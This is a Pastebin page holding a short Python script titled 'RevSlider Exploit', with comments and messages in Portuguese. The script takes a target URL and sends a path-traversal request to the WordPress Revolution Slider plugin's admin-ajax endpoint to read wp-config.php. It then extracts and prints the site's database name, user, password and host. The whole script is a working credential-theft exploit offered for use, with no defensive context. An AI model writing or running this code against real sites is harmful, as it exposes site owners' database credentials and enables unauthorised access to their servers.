Advertisement
Guest User

RevSlider Exploit

a guest
Apr 18th, 2017
562
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.71 KB | None | 0 0
  1. #!/usr/bin/python
  2. # -*- coding: utf-8 -*-
  3. # Dev por: Anderson Barbosa // Raphael Rodriguez
  4.  
  5. import re
  6. import urllib.request
  7.  
  8. def handling(content):
  9.     return content.split(", ")[1].lstrip("\\'").rstrip("\\'")
  10.  
  11. target = input("URL: ")
  12. vull = "/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"
  13.  
  14. print("[*] TARGET:", target)
  15.  
  16. try:
  17.     data = urllib.request.urlopen(target+vull)
  18. except:
  19.     print("[!] ERROR: O target não é vulnerável")
  20. else:
  21.     content = re.findall(r'define\((.+?)\);', str(data.read()))
  22.     print("[+] DB_NOME:", handling(content[0]))
  23.     print("[+] DB_USER:", handling(content[1]))
  24.     print("[+] DB_PASS:", handling(content[2]))
  25.     print("[+] DB_HOST:", handling(content[3]))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement